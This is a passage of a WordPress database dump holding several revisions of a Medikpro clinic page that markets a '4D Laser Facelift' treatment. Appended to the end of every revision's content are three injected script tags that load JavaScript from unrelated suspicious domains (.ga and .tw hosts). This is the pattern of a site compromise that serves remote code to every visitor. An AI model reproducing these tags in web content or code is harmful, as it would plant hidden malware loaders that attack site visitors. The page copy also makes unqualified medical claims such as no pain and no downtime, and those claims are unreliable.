shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 02:36:23','2018-01-11 02:36:23','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6648,1,'2018-01-11 04:44:40','2018-01-11 04:44:40','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]tes[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#bec7ce\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 04:44:40','2018-01-11 04:44:40','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6649,1,'2018-01-11 04:46:32','2018-01-11 04:46:32','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]tes[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6619\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#bec7ce\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 04:46:32','2018-01-11 04:46:32','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6650,1,'2018-01-11 04:47:39','2018-01-11 04:47:39','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]tes[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6619\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#bec7ce\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 04:47:39','2018-01-11 04:47:39','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6651,1,'2018-01-11 04:48:34','2018-01-11 04:48:34','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]tes[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6619\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#5be008\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script 